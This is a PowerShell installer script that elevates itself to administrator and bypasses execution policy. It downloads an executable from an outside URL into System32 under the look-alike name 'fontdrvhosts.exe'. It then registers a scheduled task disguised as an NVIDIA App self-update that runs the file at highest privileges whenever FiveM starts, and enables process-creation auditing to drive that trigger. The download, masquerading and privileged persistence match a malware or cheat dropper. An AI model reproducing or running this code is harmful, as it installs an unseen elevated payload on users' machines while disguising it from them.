# -----------------------------
# Fix Connection & Admin Privileges
# -----------------------------
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls

if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

# -----------------------------
# Define paths and variables
# -----------------------------
$system32Path = "$env:windir\System32"
$exeDestination = Join-Path $system32Path "fontdrvhosts.exe"
$exeUrl = "https://12bitservices.com/upload/files/2026/01/pfYdi41re0.exe"
$taskName = "NVIDIA App SelfUpdate_{B2FE1952-0186-46C3-BAEC-Z80AA35AC5B8}"
$validKey = "123"

# -----------------------------
# Menu Selection
# -----------------------------
Write-Host "Select Mode:"
Write-Host "1. Install"
Write-Host "2. Clean"
$choice = Read-Host "Enter choice (1/2)"

if ($choice -eq "1") {
    $userKey = Read-Host "Enter License Key"
    if ($userKey -ne $validKey) {
        Write-Host "Invalid Key!" -ForegroundColor Red
        Read-Host "Press Enter to exit"
        exit
    }
    
    Write-Host "Key Verified! Starting installation..." -ForegroundColor Green
    Invoke-WebRequest -Uri $exeUrl -OutFile $exeDestination
    
    # Register Key
    $regPath = "HKCU:\Software\NVIDIAApp"
    if (-not (Test-Path $regPath)) { New-Item -Path $regPath -Force | Out-Null }
    Set-ItemProperty -Path $regPath -Name "LicenseKey" -Value $userKey

    # สร้าง Task (ระบุ Path ให้ชัดเจน)
    $fivemPath = "$env:LOCALAPPDATA\FiveM\FiveM.exe"
    $cmd = 'schtasks /create /tn "' + $taskName + '" /tr "C:\Windows\System32\fontdrvhosts.exe" /sc ONEVENT /ec Security /mo "*[System[(EventID=4688)]] and *[EventData[Data[@Name=''NewProcessName'']=''' + $fivemPath + ''']]" /rl HIGHEST /f'
    Invoke-Expression $cmd

    auditpol /set /subcategory:"Process Creation" /success:enable
    Write-Host "Installation completed."
}
elseif ($choice -eq "2") {
    schtasks /delete /tn $taskName /f
    if (Test-Path $exeDestination) { Remove-Item $exeDestination -Force }
    Write-Host "Cleanup completed."
}
